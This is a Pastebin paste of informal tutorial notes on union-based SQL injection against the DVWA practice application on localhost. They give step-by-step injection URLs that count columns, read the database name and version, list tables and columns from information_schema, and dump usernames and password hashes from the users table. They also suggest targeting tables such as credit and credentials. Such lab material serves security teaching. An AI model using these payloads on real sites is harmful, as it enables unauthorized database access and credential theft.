Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. Injection
- 2. =========
- 3.
- 4. Basic SQL Injection -> Authentication Bypass
- 5.
- 6. Union Based Injection ->
- 7. =====================
- 8.
- 9. Technology -> php
- 10. Database -> MySQL
- 11.
- 12. Entering arbitrary|unwanted sql string from the front end of the website. and fetching data from the database i.e Backend
- 13.
- 14. All queries are be tried in "URL" of the website
- 15.
- 16. Steps to do penetration testing using: UNION BAED SQL INJECTION
- 17.
- 18. Target -> Get Access to complete Database
- 19.
- 20. Database -> Collection of Tables -> Collection of Columns -> Collection of data
- 21.
- 22.
- 23.
- 24. DVWA -> LOW LEVEL
- 25.
- 26. Step 1: Find GET Method in Website
- 27.
- 28. In url:
- 29.
- 30. ?id=4
- 31. ?pid=8
- 32. ?username=palvinder
- 33. ?product=chips
- 34.
- 35. ?something=sommething
- 36.
- 37. By clicking every possible link, available on the website
- 38. BY trying every option on website. Eg. Search, Submit, Comment etc
- 39.
- 40. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4&Submit=Submit#
- 41.
- 42. Step 2: Check Exception Handling or Check website is vulnerable of Not
- 43.
- 44. ?id=4'
- 45.
- 46. Website show any error (MySQL, Missing Images, Corrupt, Videos Error)
- 47.
- 48. Any change in webiste, site is vulnerable
- 49.
- 50. Step 3: Check number s
- 51.
- 52. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 1--+&Submit=Submit#
- 53.
- 54. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 2--+&Submit=Submit#
- 55.
- 56. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 3--+&Submit=Submit# ====>>>> Error
- 57.
- 58. Columns = 2
- 59.
- 60. Step 4: Select all columns
- 61.
- 62. select 1,2--+
- 63.
- 64. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select 1,2--+&Submit=Submit#
- 65.
- 66. ==>> It will be showing all vulnerable columns, from which we can get data from database
- 67.
- 68. Random = 1 , 2 , or Both
- 69.
- 70. Those Columns number are vulnerable
- 71.
- 72. Step 5: Getting Name of Database:
- 73.
- 74. database()
- 75.
- 76. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select database(),2--+&Submit=Submit#
- 77.
- 78. Name of Database = dvwa
- 79.
- 80. Step 6: Version of Database
- 81.
- 82. version()
- 83.
- 84. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select version(),2--+&Submit=Submit#
- 85.
- 86. Step 7: Get Table Name
- 87.
- 88. select 1,2--+
- 89.
- 90. select table_name,2 from information_schema.tables--+
- 91.
- 92. information_schema = Mother of database
- 93.
- 94. Knowledge of complete database
- 95.
- 96. Tables = information_schema.tables
- 97.
- 98. Columns = information_schema.columns
- 99.
- 100. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select table_name,2 from information_schema.tables--+&Submit=Submit#
- 101.
- 102. List of All Table from Database: :)
- 103.
- 104. We have to choose those table name-> Sensitive Information
- 105.
- 106. Eg:
- 107.
- 108. credit
- 109. debit
- 110. password
- 111. login
- 112. users
- 113. credentials
- 114.
- 115. Table Name= users
- 116.
- 117.
- 118. Step 8: We have to get Column Name of "users" table
- 119.
- 120.
- 121. select column_name,2 from information_schema.columns where table_name="users"--+
- 122.
- 123. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select column_name,2 from information_schema.columns where table_name="users"--+&Submit=Submit#
- 124.
- 125. ==> List of all columns, of "users" table
- 126.
- 127. Columns Name = user and password
- 128.
- 129. Step 9: DATA from Respective Columns of Particular Table
- 130.
- 131. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select user,password from users--+&Submit=Submit#
- 132.
- 133. username = Getting in brain
- 134.
- 135. password = flying over the brain (Encrypted)
- 136.
- 137. MD5 Encryption =
- 138.
- 139. HexDecimal (0-9,a-f)
- 140.
- 141. 32 Characters
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement